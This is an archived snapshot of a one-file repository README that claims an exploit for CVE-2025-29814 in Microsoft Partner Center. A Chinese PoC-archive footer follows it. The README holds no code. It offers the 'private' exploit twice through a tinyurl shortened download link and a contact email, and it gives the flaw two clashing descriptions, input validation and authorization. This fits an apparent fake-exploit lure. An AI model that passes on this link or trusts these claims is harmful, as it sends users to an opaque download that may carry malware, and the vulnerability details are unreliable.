关联漏洞
Description
Improper Input Validation (CWE-20)
介绍
# CVE-2025-29814 Improper Input Validation (CWE-20)
## Overview
Improper authorization vulnerability in Microsoft Partner Center that allows an authorized attacker to elevate privileges over a network
## Exploit:
## [Download here](https://tinyurl.com/4usjka25)
## Details
+ **CVE ID**: CVE-2025-29814
+ **Published**: 03/20/2025
+ **Impact**: Critical
+ **Exploit Availability**: Not public, only private.
+ **CVSS**: 9.3
## Vulnerability Description
An attacker could potentially: - Gain unauthorized elevated privileges within the Microsoft Partner Center - Exploit network access to escalate their system permissions - Compromise the integrity of partner account management systems - Potentially access or modify sensitive partner-related information
## Affected Versions
Microsoft Partner Center
## Contact
+ **For inquiries, please contact:brahmanski21@outlook.com**
+ **Exploit** :[Download here](https://tinyurl.com/4usjka25)
文件快照
[4.0K] /data/pocs/bb79ef893204f51ae926e62e23a1a731bbdee03f
└── [ 938] README.md
0 directories, 1 file
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮件到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对 POC 代码进行快照,为了长期维护,请考虑为本地 POC 付费/捐赠,感谢您的支持。